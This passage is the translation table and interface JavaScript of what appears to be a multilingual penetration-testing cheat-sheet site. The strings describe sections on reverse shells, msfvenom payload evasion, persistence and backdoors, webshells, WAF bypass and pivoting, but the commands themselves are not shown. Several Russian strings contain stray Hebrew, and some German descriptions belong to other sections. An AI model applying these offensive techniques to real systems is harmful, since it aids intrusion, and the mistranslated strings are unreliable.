        "section8Desc": { "en": "Automated vulnerability template scanning, SBOM generation, and dependency analysis for open source risks.", "ru": "Автоматизированное сканирование шаблонов уязвимостей, создание и анализ SBOM для рисков открытого исходного кода.", "he": "סריקת תבניות פגיעות אוטומטית, יצירת SBOM (שטר חומרת תוכנה) וניתוח תלות עבור סיכוני קוד פתוח.", "fr": "Scan automatisé de modèles de vulnérabilité, génération et analyse de SBOM pour les risques open source.", "de": "Automatisiertes Scannen von Schwachstellen-Templates, SBOM-Generierung und -Analyse für Open Source-Risiken." },
        "section8CommandDesc": { "en": "Uses open-source tools for infrastructure scanning (Nuclei) and dependency analysis (Syft/Grype).", "ru": "Использует инструменты с открытым исходным кодом для сканирования инфраструктуры (Nuclei) и анализа зависимостей (Syft/Grype).", "he": "משתמש בכלים בקוד פתוח לסריקת תשתית (Nuclei) וניתוח תלות (Syft/Grype).", "fr": "Utilise des outils open source pour le scan d'infrastructure (Nuclei) et l'analyse de dépendances (Syft/Grype).", "de": "Verwendet Open-Source-Tools für Infrastruktur-Scans (Nuclei) und Abhängigkeitsanalyse (Syft/Grype)." },

        // SECTION 9: Passwords & Credentials Tooling (AD/Kerberos)
        "section9Title": { "en": "9) Passwords & Credentials Tooling (AD/Kerberos)", "ru": "9) Пароли и учетные данные (AD/Kerberos)", "he": "9) סיסמאות וכלי אישורים (AD/Kerberos)", "fr": "9) Outils Mots de passe et Identifiants (AD/Kerberos)", "de": "9) Passwörter & Anmeldeinformationen (AD/Kerberos)" },
        "section9Desc": { "en": "Online bruteforce (authorized only), offline hash cracking, and Active Directory enumeration tools (Kerberoasting, secretsdump).", "ru": "Онлайн-перебор (только с разрешения), автономный взлом хешей и инструменты перечисления Active Directory (Kerberoasting, secretsdump).", "he": "כוח גס מקוון (באישור בלבד), פיצוח Hash לא מקוון וכלי אינומרציית Active Directory (Kerberoasting, secretsdump).", "fr": "Bruteforce en ligne (autorisé uniquement), cassage de hash hors ligne et outils d'énumération Active Directory (Kerberoasting, secretsdump).", "de": "Online-Bruteforce (nur autorisiert), Offline-Hash-Cracking und AD-Aufzählungstools (Kerberoasting, secretsdump)." },
        "section9CommandDesc": { "en": "Standard tools for credential testing, hash cracking, and AD environment assessment.", "ru": "Стандартные инструменты для тестирования учетных данных, взлома хешей и оценки среды AD.", "he": "כלים סטנדרטיים לבדיקת אישורים, פיצוח Hash והערכת סביבת AD.", "fr": "Outils standards pour le test d'identifiants, le cassage de hash et l'évaluation de l'environnement AD.", "de": "Standard-Tools für Anmeldeinformationstests, Hash-Cracking und AD-Umgebungsbewertung." },

        // SECTION 10: Exploitation: Metasploit & Exploit Consoles
        "section10Title": { "en": "10) Exploitation: Metasploit & Exploit Consoles", "ru": "10) Эксплуатация: Metasploit и консоли эксплойтов", "he": "10) ניצול: Metasploit וקונסולות ניצול", "fr": "10) Exploitation: Metasploit et Consoles d'Exploit", "de": "10) Exploit: Metasploit & Exploit-Konsolen" },
        "section10Desc": { "en": "Core Metasploit commands for searching, configuring, and executing exploits. **Lab use only.**", "ru": "Основные команды Metasploit для поиска, настройки и выполнения эксплойтов. **Только для лаборатории.**", "he": "פקודות Metasploit ליבה לחיפוש, קביעת תצורה וביצוע ניצולים. **לשימוש מעבדתי בלבד.**", "fr": "Commandes Metasploit de base pour la recherche, la configuration et l'exécution d'exploits. **Utilisation en laboratoire uniquement.**", "de": "Kern-Metasploit-Befehle zum Suchen, Konfigurieren und Ausführen von Exploits. **Nur für Laborzwecke.**" },
        "section10CommandDesc": { "en": "A template workflow for using auxiliary and exploit modules in the Metasploit console.", "ru": "Шаблон рабочего процесса для использования вспомогательных модулей и модулей эксплойтов в консоли Metasploit.", "he": "תבנית עבודה לשימוש במודולים עזר וניצול בקונסולת Metasploit.", "fr": "Un flux de travail modèle pour l'utilisation de modules auxiliaires et d'exploitation dans la console Metasploit.", "de": "Ein Template-Workflow zur Verwendung von Hilfs- und Exploit-Modulen in der Metasploit-Konsole." },

        // SECTION 11: Post-Exploitation: Reverse Shells & Enumeration
        "section11Title": { "en": "11) Post-Exploitation: Reverse Shells & Enumeration", "ru": "11) Пост-эксплуатация: Обратные оболочки и перечисление", "he": "11) פוסט-ניצול: מעטפות הפוכות ואינומרציה", "fr": "11) Post-Exploitation: Reverse Shells et Énumération", "de": "11) Post-Exploit: Reverse Shells & Aufzählung" },
        "section11Desc": { "en": "Listener commands, common reverse shell one-liners, and local privilege escalation helpers. **Lab use only.**", "ru": "Команды слушателя, общие однострочники обратной оболочки и помощники по повышению локальных привилегий. **Только для лаборатории.**", "he": "פקודות Listener, שורות פקודה נפוצות של מעטפת הפוכה ועוזרי הרחבת הרשאות מקומיות. **לשימוש מעבדתי בלבד.**", "fr": "Commandes d'écoute, one-liners courants de reverse shell et aides à l'escalade de privilèges locaux. **Utilisation en laboratoire uniquement.**", "de": "Listener-Befehle, gängige Reverse-Shell-One-Liner und Helfer zur lokalen Privilegienerweiterung. **Nur für Laborzwecke.**" },
        "section11CommandDesc": { "en": "Essential commands for establishing remote access and host reconnaissance.", "ru": "Основные команды для установления и поддержания удаленного доступа и внутренней разведки хостов.", "he": "פקודות חיוניות ליצירה ותחזוקה של גישה מרחוק וסיור מארח פנימי.", "fr": "Commandes essentielles pour établir et maintenir l'accès à distance et la reconnaissance d'hôtes internes.", "de": "Wesentliche Befehle zur Einrichtung und Aufrechterhaltung des Fernzugriffs und der internen Host-Aufklärung." },

        // SECTION 12: Network & TLS Checks
        "section12Title": { "en": "12) Network & TLS Checks", "ru": "12) Проверки сети и TLS", "he": "12) בדיקות רשת ו-TLS", "fr": "12) Vérifications Réseau et TLS", "de": "12) Netzwerk- & TLS-Prüfungen" },
        "section12Desc": { "en": "Traffic capture, packet analysis, and SSL/TLS configuration checks.", "ru": "Захват трафика, анализ пакетов и проверка конфигурации SSL/TLS.", "he": "לכידת תעבורה, ניתוח מנות ובדיקות תצורת SSL/TLS.", "fr": "Capture de trafic, analyse de paquets et vérifications de configuration SSL/TLS.", "de": "Verkehrserfassung, Paketanalyse und SSL/TLS-Konfigurationsprüfungen." },
        "section12CommandDesc": { "en": "Commands for network diagnostics and assessing the cryptographic strength of web endpoints.", "ru": "Команды для сетевой диагностики ו оценка криптографической стойкости веб-конечных точек.", "he": "פקודות לאבחון רשת והערכת החוזק הקריפטוגרפי של נקודות קצה אינטרנט.", "fr": "Commandes pour le diagnostic réseau et l'évaluation de la force cryptographique des points de terminaison Web.", "de": "Wesentliche Befehle zur Einrichtung und Aufrechterhaltung des Fernzugriffs und der internen Host-Aufklärung." },

        // SECTION 13: Vulnerability Research & PoC Triage
        "section13Title": { "en": "13) Vulnerability Research & PoC Triage", "ru": "13) Исследование уязвимостей и сортировка PoC", "he": "13) מחקר פגיעויות וטריאז' PoC", "fr": "13) Recherche de Vulnérabilités et Tri PoC", "de": "13) Schwachstellenforschung & PoC-Triage" },
        "section13Desc": { "en": "Searching local exploit databases and safely running proof-of-concept code in isolation.", "ru": "Поиск локальных баз данных эксплойтов и безопасное выполнение кода подтверждения концепции в изоляции.", "he": "חיפוש בבסיסי נתונים מקומיים של ניצולים והרצת קוד הוכחת היתכנות (PoC) בבידוד בבטחה.", "fr": "Recherche dans les bases de données d'exploits locales et exécution sécurisée de code de preuve de concept en isolement.", "de": "Suche in lokalen Exploit-Datenbanken und sichere Ausführung von Proof-of-Concept-Code in Isolation." },
        "section13CommandDesc": { "en": "Emphasizes local search (searchsploit) and the use of network-isolated containers to prevent lateral movement.", "ru": "Подчеркивает локальный поиск (searchsploit) и использование сетевых изолированных контейнеров для предотвращения горизонтального перемещения.", "he": "מדגיש חיפוש מקומי (searchsploit) ושימוש במכולות מבודדות רשת למניעת תנועה רוחבית.", "fr": "Met l'accent sur la recherche locale (searchsploit) et l'utilisation de conteneurs isolés du réseau pour prévenir les mouvements latéraux.", "de": "Betont die lokale Suche (searchsploit) und die Verwendung von netzwerkisolierten Containern zur Verhinderung von lateralen Bewegungen." },

        // SECTION 14: Binary Reversing & Exploit Development
        "section14Title": { "en": "14) Binary Reversing & Exploit Development", "ru": "14) Реверсирование бинарных файлов и разработка эксплойтов", "he": "14) הנדסה הפוכה ופיתוח ניצול", "fr": "14) Rétro-ingénierie binaire et développement d'exploits", "de": "14) Binär-Reverse-Engineering & Exploit-Entwicklung" },
        "section14Desc": { "en": "Static analysis (ELF), ROP gadget hunting, and interactive debugging setup.", "ru": "Статический анализ (ELF), поиск ROP-гаджетов и настройка интерактивной отладки.", "he": "ניתוח סטטי (ELF), ציד גאדג'טים של ROP והגדרת ניפוי באגים אינטראקטיבי.", "fr": "Analyse statique (ELF), chasse aux gadgets ROP et configuration de débogage interactif.", "de": "Tools zur Analyse von Header-Dateien, Assembly-Code und zur Vorbereitung von Buffer-Overflow-Exploits." },
        "section14CommandDesc": { "en": "Tools used for analyzing executable file headers, assembly code, and preparing buffer overflow exploits.", "ru": "Инструменты, используемые для анализа заголовков исполняемых файлов, кода ассемблера ו подготовка эксплойטים של גלישת חוצץ.", "he": "כלים המשמשים לניתוח כותרות קבצים ניתנים להרצה, קוד אסמבלי והכנת ניצול גלישת חוצץ.", "fr": "Outils utilisés pour analyser les en-têtes de fichiers exécutables, le code assembleur et préparer des exploits de dépassement de tampon.", "de": "Tools zur Analyse von Header-Dateien, Assembly-Code und zur Vorbereitung von Buffer-Overflow-Exploits." },

        // SECTION 15: Fuzzing
        "section15Title": { "en": "15) Fuzzing", "ru": "15) Фаззинг", "he": "15) פאזינג", "fr": "15) Fuzzing", "de": "15) Fuzzing" },
        "section15Desc": { "en": "Instrumented binary fuzzing and HTTP request fuzzing for input discovery.", "ru": "Инструментированный фаззинг бинарных файлов и фаззинг HTTP-запросов для обнаружения ввода.", "he": "פאזינג בינארי מונחה ופאזינג בקשות HTTP לגילוי קלט.", "fr": "Fuzzing binaire instrumenté et fuzzing de requêtes HTTP pour la découverte d'entrées.", "de": "Instrumentiertes Binär-Fuzzing und HTTP-Anfrage-Fuzzing zur Eingabeerkennung." },
        "section15CommandDesc": { "en": "AFL is used for finding crashes in C/C++ binaries; Wfuzz is used for black-box web fuzzing.", "ru": "AFL используется для поиска сбоев в бинарных файлах C/C++; Wfuzz используется для фаззинга черного ящика веб-приложений.", "he": "AFL משמש למציאת קריסות בבינארי C/C++; Wfuzz משמש לפאזינג קופסה שחורה של ווב.", "fr": "AFL est utilisé pour trouver des crashs dans les binaires C/C++; Wfuzz est utilisé pour le fuzzing Web en boîte noire.", "de": "AFL wird zur Fehlersuche in C/C++-Binärdateien verwendet; Wfuzz wird für Black-Box-Web-Fuzzing eingesetzt." },

        // SECTION 16: Mobile & Firmware Analysis
        "section16Title": { "en": "16) Mobile & Firmware Analysis", "ru": "16) Анализ мобильных устройств и прошивок", "he": "16) ניתוח מובייל וקושחה", "fr": "16) Analyse Mobile et Firmware", "de": "16) Mobil- & Firmware-Analyse" },
        "section16Desc": { "en": "Decompilation of APKs, dynamic runtime analysis (Frida), and firmware extraction.", "ru": "Декомпиляция APK, динамический анализ времени выполнения (Frida) и извлечение прошивки.", "he": "דה-קומפילציה של APKs, ניתוח זמן ריצה דינמי (Frida) וחילוץ קושחה.", "fr": "Décompilation d'APK, analyse dynamique d'exécution (Frida) et extraction de firmware.", "de": "Dekompliierung von APKs, dynamische Laufzeitanalyse (Frida) und Firmware-Extraktion." },
        "section16CommandDesc": { "en": "Commands for static and dynamic analysis of Android apps and embedded system binaries.", "ru": "Команды для статического и динамического анализа приложений Android и бинарных файлов встроенных систем.", "he": "פקודות לניתוח סטטי ודינמי של אפליקציות אנדרואיד ובינארי מערכות משובצות.", "fr": "Commandes pour l'analyse statique et dynamique des applications Android et des binaires de systèmes embarqués.", "de": "Befehle zur statischen und dynamischen Analyse von Android-Apps und eingebetteten Systembinärdateien." },

        // SECTION 17: Container & Kubernetes Hardening
        "section17Title": { "en": "17) Container & Kubernetes Hardening", "ru": "17) Укрепление контейнеров и Kubernetes", "he": "17) חיזוק קונטיינרים ו-Kubernetes", "fr": "17) Durcissement Conteneurs et Kubernetes", "de": "17) Container- & Kubernetes-Härtung" },
        "section17Desc": { "en": "Assessing container misconfigurations, privilege escalation within Docker, and basic K8s pod checks.", "ru": "Оценка неверных конфигураций контейнеров, повышение привилегий внутри Docker и базовые проверки K8s-подов.", "he": "הערכת תצורות שגויות של קונטיינרים, הרחבת הרשאות בתוך Docker ובדיקות פוד K8s בסיסיות.", "fr": "Évaluation des erreurs de configuration de conteneurs, escalade de privilèges dans Docker et vérifications de pods K8s de base.", "de": "Überprüfung von Container-Fehlkonfigurationen, Privilegienerweiterung in Docker und grundlegende K8s-Pod-Prüfungen." },
        "section17CommandDesc": { "en": "Commands for checking Docker security posture and common container escape vectors.", "ru": "Команды для проверки уровня безопасности Docker и общих векторов побега из контейнера.", "he": "פקודות לבדיקת מצב האבטחה של Docker ווקטורים נפוצים לבריחת קונטיינרים.", "fr": "Commandes pour vérifier la posture de sécurité Docker et les vecteurs d'évasion de conteneurs courants.", "de": "Befehle zur Überprüfung der Docker-Sicherheitsposition und gängiger Container-Fluchtvektoren." },

        // SECTION 18: Evasion & msfvenom Payloads
        "section18Title": {"en": "18) Evasion & msfvenom Payloads", "ru": "18) Обход и полезные нагрузки msfvenom", "he": "18) התחמקות ומטעני msfvenom", "fr": "18) Évasion et Payloads msfvenom", "de": "18) Evasion & msfvenom Payloads"},
        "section18Desc": {"en": "Generating and encoding reverse shell payloads. **AUTHORIZED USE ONLY.**", "ru": "Генерация и кодирование полезных нагрузок обратной оболочки. **ТОЛЬКО С РАЗРЕШЕНИЯ.**", "he": "יצירה וקידוד של מטעני מעטפת הפוכה. **שימוש מורשה בלבד.**", "fr": "Génération et encodage de payloads de reverse shell. **UTILISATION AUTORISÉE UNIQUEMENT.**", "de": "Generierung und Kodierung von Reverse-Shell-Payloads. **NUR FÜR AUTORISIERTE NUTZUNG.**"},
        "section18CommandDesc": {"en": "Use the '-e' flag for evasion (encoding) and the '-f' flag for different output formats.", "ru": "Используйте флаг '-e' для обхода (кодирования) и флаг '-f' для различных форматов вывода.", "he": "השתמש בדגל '-e' להתחמקות (קידוד) ובדגל '-f' לפורמטי פלט שונים.", "fr": "Utilisez le drapeau '-e' pour l'évasion (encodage) et le drapeau '-f' pour différents formats de sortie.", "de": "Verwenden Sie das Flag '-e' für Evasion (Kodierung) und das Flag '-f' für verschiedene Ausgabeformate."},
        
        // SECTION 19: File Transfer (In-Memory & On-Disk)
        "section19Title": {"en": "19) File Transfer (In-Memory & On-Disk)", "ru": "19) Передача файлов (в памяти и на диск)", "he": "19) העברת קבצים (בזיכרון ועל דיסק)", "fr": "19) Transfert de Fichiers (Mémoire & Disque)", "de": "19) Dateiübertragung (In-Memory & On-Disk)"},
        "section19Desc": {"en": "Common methods to transfer files to and from a compromised host (Linux/Windows).", "ru": "Общие методы передачи файлов на скомпрометированный хост и обратно (Linux/Windows).", "he": "שיטות נפוצות להעברת קבצים אל ומאתר מארח שנפרץ (לינוקס/חלונות).", "fr": "Méthodes courantes pour transférer des fichiers vers et depuis un hôte compromis (Linux/Windows).", "de": "Gängige Methoden zur Dateiübertragung von und zu einem kompromittierten Host (Linux/Windows)."},
        "section19CommandDesc": {"en": "Essential techniques using native binaries (curl, wget) and common languages (Python, Netcat).", "ru": "Основные методы с использованием нативных бинарных файлов (curl, wget) и распространенных языков (Python, Netcat).", "he": "טכניקות חיוניות המשתמשות בבינאריות מקוריות (curl, wget) ושפות נפוצות (Python, Netcat).", "fr": "Techniques essentielles utilisant des binaires natifs (curl, wget) et des langages courants (Python, Netcat).", "de": "Wesentliche Techniken unter Verwendung nativer Binärdateien (curl, wget) und gängiger Sprachen (Python, Netcat)."},

        // SECTION 20: Tunneling & Pivoting
        "section20Title": {"en": "20) Tunneling & Pivoting", "ru": "20) Туннелирование и пивотинг", "he": "20) יצירת מנהרות ופיבוטינג", "fr": "20) Tunneling et Pivoting", "de": "20) Tunneling & Pivoting"},
        "section20Desc": {"en": "Establishing network access to otherwise unreachable internal networks from a compromised host (pivoting).", "ru": "Установление сетевого доступа к недоступным внутренним сетям со скомпрометированного хоста (пивотинг).", "he": "יצירת גישת רשת לרשתות פנימיות שלא היו נגישות אחרת מתוך מארח שנפרץ (פיבוטינג).", "fr": "Établissement d'un accès réseau à des réseaux internes autrement inaccessibles depuis un hôte compromis (pivoting).", "de": "Einrichtung eines Netzwerkzugriffs auf ansonsten unerreichbare interne Netzwerke von einem kompromittierten Host (Pivoting)."},
        "section20CommandDesc": {"en": "Utilizing SSH, Meterpreter, and native tools to create port forwards and SOCKS proxies.", "ru": "Использование SSH, Meterpreter וכלים נתיבים ליצירת העברת פורטים ופרוקסי SOCKS.", "he": "שימוש ב-SSH, Meterpreter וכלים מקוריים ליצירת העברת פורטים ופרוקסי SOCKS.", "fr": "Utilisation de SSH, Meterpreter et d'outils natifs pour créer des redirections de ports et des proxys SOCKS.", "de": "Nutzung von SSH, Meterpreter und nativen Tools zur Erstellung von Port-Forwards und SOCKS-Proxies."},
        
        // SECTION 21: Persistence & Backdoors
        "section21Title": {"en": "21) Persistence & Backdoors", "ru": "21) Постоянство и бэкдоры", "he": "21) התמדה ודלתות אחוריות", "fr": "21) Persistance et Backdoors", "de": "21) Persistenz & Backdoors"},
        "section21Desc": {"en": "Establishing unauthorized, persistent access via cron jobs, systemd, or binary modification. **DEFENSIVE EDUCATION ONLY.**", "ru": "Установление несанкционированного, постоянного доступа через задания cron, systemd или модификацию двоичных файлов. **ТОЛЬКО ДЛЯ ЗАЩИТНОГО ОБУЧЕНИЯ.**", "he": "יצירת גישה לא מורשית וקבועה באמצעות עבודות cron, systemd או שינוי בינארי. **למטרות חינוך הגנתי בלבד.**", "fr": "Établissement d'un accès non autorisé et persistant via des tâches cron, systemd ou la modification binaire. **ÉDUCATION DÉFENSIVE UNIQUEMENT.**", "de": "Einrichtung unbefugten, persistenten Zugriffs über Cron-Jobs, systemd oder binäre Modifikation. **NUR FÜR DEFENSIVE SCHULUNG.**"},
        "section21CommandDesc": {"en": "Common techniques used by adversaries to maintain access after an initial compromise.", "ru": "Общие методы, используемые злоумышленниками для сохранения доступа после первоначального взлома.", "he": "טכניקות נפוצות המשמשות על ידי יריבים לשמירה על גישה לאחר פריצה ראשונית.", "fr": "Techniques courantes utilisées par les adversaires pour maintenir l'accès après un compromis initial.", "de": "Gängige Techniken zur Aufrechterhaltung des Zugriffs nach einem ersten Kompromiss."},

        // SECTION 22: Web Filtering Evasion (WAF/IDPS)
        "section22Title": {"en": "22) Web Filtering Evasion (WAF/IDPS)", "ru": "22) Обход веб-фильтрации (WAF/IDPS)", "he": "22) התחמקות מסינון ווב (WAF/IDPS)", "fr": "22) Évasion Filtrage Web (WAF/IDPS)", "de": "22) Webfilter-Umgehung (WAF/IDPS)"},
        "section22Desc": {"en": "Techniques to bypass web application firewalls (WAFs) and intrusion detection systems (IDPS) for common web vulnerabilities.", "ru": "Методы обхода брандмауэров веб-приложений (WAF) и систем обнаружения вторжений (IDPS) для общих веб-уязвимостей.", "he": "טכניקות לעקיפת חומות אש ליישומי ווב (WAFs) ומערכות גילוי פריצות (IDPS) עבור פגיעויות ווב נפוצות.", "fr": "Techniques pour contourner les pare-feu d'applications web (WAFs) et les systèmes de détection d'intrusion (IDPS) pour les vulnérabilités web courantes.", "de": "Techniken zur Umgehung von Web Application Firewalls (WAFs) und Intrusion Detection Systems (IDPS) für gängige Web-Schwachstellen."},
        "section22CommandDesc": {"en": "Focuses on injection payload encoding and obfuscation techniques used in vulnerability research.", "ru": "Фокусируется на кодировании полезной нагрузки инъекций и методах обфускации, используемых в исследовании уязвимостей.", "he": "מתמקד בקידוד מטעני הזרקה וטכניקות הסוואה המשמשות במחקר פגיעויות.", "fr": "Se concentre sur l'encodage de la charge utile d'injection et les techniques d'obfuscation utilisées dans la recherche de vulnérabilités.", "de": "Konzentriert sich auf das Kodieren von Injektions-Payloads und Obfuskationstechniken, die in der Schwachstellenforschung verwendet werden."},

        // SECTION 23: Privilege Escalation (Linux)
        "section23Title": {"en": "23) Privilege Escalation (Linux)", "ru": "23) Повышение привилегий (Linux)", "he": "23) הרחבת הרשאות (לינוקס)", "fr": "23) Escalade de Privilèges (Linux)", "de": "23) Privilegienerweiterung (Linux)"},
        "section23Desc": {"en": "Key commands for local Linux enumeration to discover misconfigurations that grant root access (SUDO, SUID, capabilities).", "ru": "Ключевые команды для локального перечисления Linux для обнаружения неверных конфигураций, которые предоставляют корневой доступ (SUDO, SUID, возможности).", "he": "פקודות מפתח לאינומרציה מקומית בלינוקס לגילוי תצורות שגויות המעניקות גישת שורש (SUDO, SUID, יכולות).", "fr": "Commandes clés pour l'énumération locale Linux afin de découvrir les erreurs de configuration qui accordent un accès root (SUDO, SUID, capacités).", "de": "Schlüsselbefehle zur lokalen Linux-Aufzählung, um Fehlkonfigurationen zu entdecken, die Root-Zugriff gewähren (SUDO, SUID, Funktionen)."},
        "section23CommandDesc": {"en": "Checking common files and permissions for weakness on a compromised Linux host.", "ru": "Проверка общих файлов и разрешений на наличие слабостей на скомпрометированном хосте Linux.", "he": "בדיקת קבצים והרשאות נפוצים לחולשה במארח לינוקס שנפרץ.", "fr": "Vérification des fichiers et autorisations courants pour les faiblesses sur un hôte Linux compromis.", "de": "Überprüfung gängiger Dateien und Berechtigungen auf Schwachstellen auf einem kompromittierten Linux-Host."},

        // SECTION 24: WebShell One-Liners
        "section24Title": {"en": "24) WebShell One-Liners", "ru": "24) Однострочники WebShell", "he": "24) שורות פקודה WebShell", "fr": "24) One-Liners WebShell", "de": "24) WebShell One-Liner"},
        "section24Desc": {"en": "Simple command execution payloads often used in conjunction with file upload or command injection vulnerabilities. **DEFENSIVE EDUCATION ONLY.**", "ru": "Простые полезные нагрузки для выполнения команд, часто используемые в сочетании с уязвимостями загрузки файлов или внедрения команд. **ТОЛЬКО ДЛЯ ЗАЩИТНОГО ОБУЧЕНИЯ.**", "he": "מטענים פשוטים לביצוע פקודות המשמשים לעתים קרובות בשילוב עם פגיעויות העלאת קבצים או הזרקת פקודות. **למטרות חינוך הגנתי בלבד.**", "fr": "Charges utiles simples d'exécution de commandes souvent utilisées conjointement avec des vulnérabilités de téléchargement de fichiers ou d'injection de commandes. **ÉDUCATION DÉFENSIVE UNIQUEMENT.**", "de": "Einfache Befehlsausführungs-Payloads, die oft in Verbindung mit Dateiupload- oder Befehlsinjektions-Schwachstellen verwendet werden. **NUR FÜR DEFENSIVE SCHULUNG.**"},
        "section24CommandDesc": {"en": "Basic payloads that provide remote command execution on PHP or Python web servers.", "ru": "Базовые полезные нагрузки, обеспечивающие удаленное выполнение команд на веб-серверах PHP или Python.", "he": "מטענים בסיסיים המספקים ביצוע פקודות מרחוק בשרתי ווב PHP או Python.", "fr": "Charges utiles de base qui fournissent l'exécution de commandes à distance sur les serveurs Web PHP ou Python.", "de": "Grundlegende Payloads, die die Remote-Befehlsausführung auf PHP- oder Python-Webservern ermöglichen."},

        // SECTION 25: Safe PoC Testing & Logging (Replaced 17)
        "section25Title": { "en": "25) Safe PoC Testing & Logging", "ru": "25) Безопасное тестирование PoC и ведение журнала", "he": "25) בדיקות PoC בטוחות ורישום לוגים", "fr": "25) Test PoC Sécurisé et Journalisation", "de": "25) Sicheres PoC-Testen & Protokollierung" },
        "section25Desc": { "en": "Ensuring safe, reproducible testing environments and comprehensive logging.", "ru": "Обеспечение безопасных, воспроизводимых сред тестирования и комплексного ведения журнала.", "he": "הבטחת סביבות בדיקה בטוחות וניתנות לשחזור ורישום לוגים מקיף.", "fr": "Assurer des environnements de test sûrs et reproductibles et une journalisation complète.", "de": "Gewährleistung sicherer, reproduzierbarer Testumgebungen und umfassender Protokollierung." },
        "section25CommandDesc": { "en": "Techniques to minimize risk via Docker isolation and ensure detailed test outcome logging.", "ru": "Методы минимизации риска с помощью изоляции Docker и обеспечения подробного протоקוליрования результатов тестирования.", "he": "טכניקות למזעור סיכונים באמצעות בידוד Docker והבטחת רישום מפורט של תוצאות הבדיקה.", "fr": "Techniques pour minimiser les risques via l'isolation Docker et garantir la journalisation détaillée des résultats des tests.", "de": "Techniken zur Minimierung des Risikos durch Docker-Isolation und zur Gewährleistung einer detaillierten Protokollierung der Testergebnisse." }
    };

    // Global state for collapse tracking
    let collapsed = true; // Default to collapsed

    // --- COOKIE AND LANGUAGE PERSISTENCE FUNCTIONS ---

    // Helper function to set a cookie
    function setCookie(name, value, days) {
        let expires = "";
        if (days) {
            const date = new Date();
            date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
            expires = "; expires=" + date.toUTCString();
        }
        document.cookie = name + "=" + (value || "")  + expires + "; path=/; SameSite=Lax";
    }

    // Helper function to get a cookie
    function getCookie(name) {
        const nameEQ = name + "=";
        const ca = document.cookie.split(';');
        for(let i=0; i < ca.length; i++) {
            let c = ca[i];
            while (c.charAt(0)==' ') c = c.substring(1,c.length);
            if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
        }
        return null;
    }

    // --- CORE TRANSLATION FUNCTION ---

    function translate(lang) {
        // 1. Set the main HTML direction for RTL languages
        if (lang === 'he') {
            document.documentElement.setAttribute('dir', 'rtl');
        } else {
            document.documentElement.setAttribute('dir', 'ltr');
        }

        // 2. Translate all elements with 'data-i18n' attributes
        for (const key in translations) {
            const elements = document.querySelectorAll(`[data-i18n="${key}"]`);
            elements.forEach(el => {
                if (translations[key][lang]) {
                    el.innerHTML = translations[key][lang];
                }
            });
        }

        // 3. Update the active language dropdown value
        const langSelect = document.getElementById('languageSelect');
        if (langSelect) {
             langSelect.value = lang;
        }

        // 4. Update the toggle button text
        const toggleButton = document.getElementById('toggleAllButton');
        if (toggleButton) {
            const toggleKey = collapsed ? 'toggleButtonCollapsed' : 'toggleButtonExpanded';
            toggleButton.textContent = translations[toggleKey][lang] || (collapsed ? 'Expand All' : 'Collapse All');
        }

        // 5. Save the preference
        setCookie('cheatsheet_lang', lang, 30);
        
        // 6. Update the copy feedback span default text
        document.querySelectorAll('.copy-feedback').forEach(span => {
            if (!span.classList.contains('visible')) {
                span.textContent = translations['copyButtonText'][lang] || 'Copy';
            }
        });

        // 7. Update share links URL (Functionalized)
        const currentUrl = encodeURIComponent(window.location.href);
        const defaultTextKey = "mainTitle"; // Use main title for shared text
        const sharedTitle = translations[defaultTextKey][lang] || translations[defaultTextKey]['en'];
        const shareText = encodeURIComponent(`${sharedTitle} by @trippingalien — Commands for recon, exploits, and reversing.`);
        
        const twitterShare = document.querySelector('.social-icon.twitter');
        if (twitterShare) {
            twitterShare.href = `https://twitter.com/intent/tweet?text=${shareText}&url=${currentUrl}`;
        }
        const linkedinShare = document.querySelector('.social-icon.linkedin');
        if (linkedinShare) {
            linkedinShare.href = `https://www.linkedin.com/sharing/share-offsite/?url=${currentUrl}`;
        }
        const telegramShare = document.querySelector('.social-icon.telegram');
        if (telegramShare) {
            telegramShare.href = `https://t.me/share/url?url=${currentUrl}&text=${shareText}`;
        }
        
        // 8. Re-apply toggle icon state after translation, in case language changed
        document.querySelectorAll('.toggle-icon').forEach(icon => {
            icon.textContent = collapsed ? icon.getAttribute('data-collapsed') : icon.getAttribute('data-expanded');
        });
    }

    // --- COPY & SECTION LOGIC ---

    function copyCommand(preElement) {
        const code = preElement.querySelector('code').innerText;
        const feedbackSpan = preElement.querySelector('.copy-feedback');

        // Clean code: Remove leading shell prompt ($ or #) and empty lines for clean copy-paste
        const lines = code.split('\n');
        const cleanedCode = lines.map(line => {
            const trimmedLine = line.trim();
            // Remove leading shell prompt symbols if the line starts with them
            if (trimmedLine.startsWith('#') || trimmedLine.startsWith('$')) {
                return ''; // Exclude instructional comments
            }
            return line;
        }).filter(line => line.trim() !== '').join('\n').trim();

        navigator.clipboard.writeText(cleanedCode).then(() => {
            const lang = getCookie('cheatsheet_lang') || 'en';
            // Custom simplified logic for "Copied!" text
            const copiedText = translations['copyButtonText'][lang] === 'Copy' ? 'Copied!' : 
                               translations['copyButtonText'][lang] === 'Копировать' ? 'Скопировано!' : 
                               translations['copyButtonText'][lang] === 'העתק' ? 'הועתק!' : 
                               translations['copyButtonText'][lang] === 'Copier' ? 'Copié!' : 
                               translations['copyButtonText'][lang] === 'Kopieren' ? 'Kopiert!' : 'Copied!';
            
            // Show feedback
            feedbackSpan.textContent = copiedText;
            feedbackSpan.classList.add('visible');
            
            setTimeout(() => {
                // Hide the message and restore the original text
                feedbackSpan.classList.remove('visible');
                feedbackSpan.textContent = translations['copyButtonText'][lang] || 'Copy'; 
            }, 1500);
        }).catch(err => {
            console.error('Failed to copy: ', err);
        });
    }

    function setupSectionToggles() {
        document.querySelectorAll('.section-header').forEach(header => {
            const sectionId = header.getAttribute('data-target');
            const content = document.getElementById(sectionId);
            const icon = header.querySelector('.toggle-icon');
            const expandedIcon = icon.getAttribute('data-expanded');
            const collapsedIcon = icon.getAttribute('data-collapsed');

            header.addEventListener('click', function() {
                const isExpanded = content.style.display === 'block';
                content.style.display = isExpanded ? 'none' : 'block';
                icon.textContent = isExpanded ? collapsedIcon : expandedIcon;
                this.setAttribute('aria-expanded', !isExpanded);
            });
            
            // Apply initial collapsed state 
            content.style.display = collapsed ? 'none' : 'block';
            icon.textContent = collapsed ? collapsedIcon : expandedIcon;
            header.setAttribute('aria-expanded', !collapsed);
        });
    }

    function toggleAll() {
        collapsed = !collapsed;
        const allContent = document.querySelectorAll('.section-content');
        const toggleButton = document.getElementById('toggleAllButton');
        const lang = getCookie('cheatsheet_lang') || 'en';

        allContent.forEach(content => {
            content.style.display = collapsed ? 'none' : 'block';
        });
        
        document.querySelectorAll('.toggle-icon').forEach(icon => {
            const expandedIcon = icon.getAttribute('data-expanded');
